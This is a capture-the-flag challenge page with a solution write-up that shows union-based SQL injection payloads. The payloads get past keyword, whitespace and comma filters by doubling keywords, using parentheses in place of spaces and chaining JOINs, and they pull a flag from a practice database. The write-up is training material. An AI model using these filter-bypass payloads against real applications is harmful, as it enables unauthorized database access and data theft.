Medium/hard Can you find the flag via SQL injection?
Important information
Challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic unless clearly specified in the challenge information below.
Challenge Information
The form is vulnerable to SQL injection and there's a flag inside the database waiting for you. Using ONLY union based injection, can you retrieve it?
 
Challenge Solutions
Solution from noob
Note: xD so I forgot to add filters/blacklist in the 'password' parameter and many people solved it using that way, I later realized when someone shared me his solution of my challenge. so I have fixed it now, for those who did that way ;) try now!
In this challenge,the task was to evade the SQL blacklist/filters and get the flag in a single request, so the following hints on https://www.bugbountynotes.com/challenge?id=7 were given:
- Observe the SQL Error to see if there are any blacklistings on some special characters
Explaination:
After some hit and trails and since errors were verbose, one could identify that whitespaces, commas(,) , and , or , / etc. were converted to empty strings with username: 'xxorxxandxx test you can see in the error only xxxxxx is present that means 'or' and 'and' keyword was removed but you can use 'oorr' which would evaluate to 'or' because and similar for 'and' etc keywords
- In SQL you can use parenthesis at a lot of places instead of spaces
Explaination: In SQL you can use paranthesis or brackets at various places and avoid spaces that way it was possible to bypass whitespaces filter.
1. To Find Number of columns used in a table you can use a trick like
select ((select * from {table}))=1
this query will throw an error and reveal the number of columns in the table. But since the schema was already given(added later in the challenge) you knew the table name(flag) and column names and it was easy to know the number of columns present but without this information also, you could have used
'anandd(select*from(flag))=1#
and this will tell there are four columns in the table where # is a SQL comment and will comment out the rest of the query
Note: I used anandd because 'and' was converted to '' so 'anandd' becomes 'and'
- We can join different tables in SQL
Since commas are blocked we can't use union select with more than 1 columns however there are 4 columns in the table of current query but for union clause both table should have equal no. of columns. In that case we could use SQL Joins and completely bypass commas (,).
1. Union Clause
As I already had given information(column names,table names etc..) to make challenge easier which wasn't necessary, we could have used something like this
Solution: xxx'Union(select*from(select(1))a
join(select(2))b
join(select(3))c
join(select(4))d
)#
Explaination:
JOIN is used to join 2 or more tables in SQL. It will combine the rows and columns of both the tables. Since more tables u combine the rows and columns will increase and all we care about is matching the number of columns to the original table so we can successfully use Union Clause. so what we do is:
Union Select * from (select 'tbl1 column') alias_table1
join (select 'tbl2 column') alias_table2
join (select 'tbl3 column') alias_table3
join (select 'tbl4 column') alias_table4
so lets divide it into parts and understand:
(select 'tbl1 column') alias_table1
This part of the query creates an alias/temporary table named 'alias_table1' with one column and its value "tbl1 column" similarly we create 3 more such "Fake" tables and their alias' and join them with "JOIN" operator. Thus joining 4 tables with 1 columns each becomes total of 4 columns which was same the number of columns in the original table and the required situation for using Union Select.
now all we had to do was to remove spaces and make it shorter for which we could have used spaces
to make query small and clean i have used a,b,c,d... etc as alias name for tables.
xxx'Union(select*from(select(1))a
join(select(2))b
join(select(3))c
join(select(4))d
)#
Now After using this payload we see that it shows Logged in as '2' in the response of the page. which means we could control column of table aliased as 'b'
2. Extracting flag
Simply extract flag column from flag table and we'll get the flag contents in the response. Use this query (select(flag)from(flag)) inplace of column of table 'b' since only that column was visible on the page
xxx'Union(select*from(select(1))a
join(select(flag)from(flag))b
join(select(3))c
join(select(4))d
)#
and boom!
Logged In! as : flag{dDhbLnVnQF1UOypEbmtjd24jQ1VpP21fckNKLHZMI112QEFrKEItMzJ9fUBfLHRjTjozWFNETUxpQFNUViglLmo1Kmp6JnldTksofTItYWN2dHlxVmJKIyU9Vy57e0F3aWFKbip0M3JxOGZ0ejo1JXtSM241UXEsdk5uW2NkLnpOW2docXZucj1LaCpXdlB6R3A7ZHQ6OFY3VC5fcSpqdjVSUll9NjpoQCU5dSo9ejUmPXolMz9kMltMejVDQW1YM0hUWkdBKjZdV1VQcCwuJVgzI0UlRiw2ODJoTVR4JiFLI3lyIUxqdXhYa3lpKUYpLzMzNUZoSyM2cnY9cEw6ZilTSEFLUD8rKT9LVGJjTnpmRC1LbnlaR1l1Mj1aaHgjU3JoNipBWllTdTIpCg==}
Challenge Creator
Challenge hints
Completed By — View more
Accepted on 30-10-2018
Accepted on 30-09-2018

Accepted on 09-11-2018
💪 Think you've solved the challenge? Fill out the form below and the challenge creator will verify and get back to you!
Whilst challenges are typically safe please make sure to not use real details such as email/passwords.
Challenge URL: https://root0x00.altervista.org/sqli.php